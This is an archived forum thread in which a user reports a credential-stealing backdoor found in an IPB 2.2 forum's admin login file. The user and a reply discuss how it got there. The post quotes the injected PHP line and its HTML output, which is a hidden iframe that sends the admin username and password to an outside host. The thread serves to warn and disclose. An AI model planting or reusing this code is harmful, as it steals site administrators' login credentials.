Jump to content

Exploit warning

Guest jdtate78

Recommended Posts


I have a client, more a friend actually who has an IPB 2.2 install, anyway he contacted me as he couldnt get into his ACP, it just hung and did not redirect, he didnt have time to wait for support or anything so I took a look.

Upon submitting admin log in details I found the browser attempting to connect to this site http://zybez.ath.cx particularly a php file called connector.php at this URL http://zybez.ath.cx/connector.php, when I looked at the source code I found the following:

<script>window.stuats='';</script><div style="display:none"><iframe src="http://zybez.ath.cx/connector.php?site=http://site.com/ipbforum&user=administrator&pass=PASSWORDREMOVED\"></div>

As you can see it look like this exploit is sending admin login details straight to the hackers website. After doing some more poking around in the IPB files i found the following code in sources/action_admin/login.php on line 226

$connector = '<script>window.stuats=\'\';</script><div style="display:none"><iframesrc="http://zybez.ath.cx/connector.php?site=' . htmlentities($this->ipsclass->vars['board_url']) . '&user=' . htmlentities($this->ipsclass->input['username']) . '&pass=' . htmlentities($this->ipsclass->input['password']) . '\"></div>';

Im guessing this code isnt part of the original IPB files?

Once the code wsa removed all was well.


Link to comment
Share on other sites

Would mean the "hacker" had direct access to the file code - either via FTP, or by being hosted on the same server, and security settings being lax (open_basedir off, file chmod 777, etc.).

This is not a support forum, however, I'm afraid. Your friend will need to submit a ticket for support.

Link to comment
Share on other sites


This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...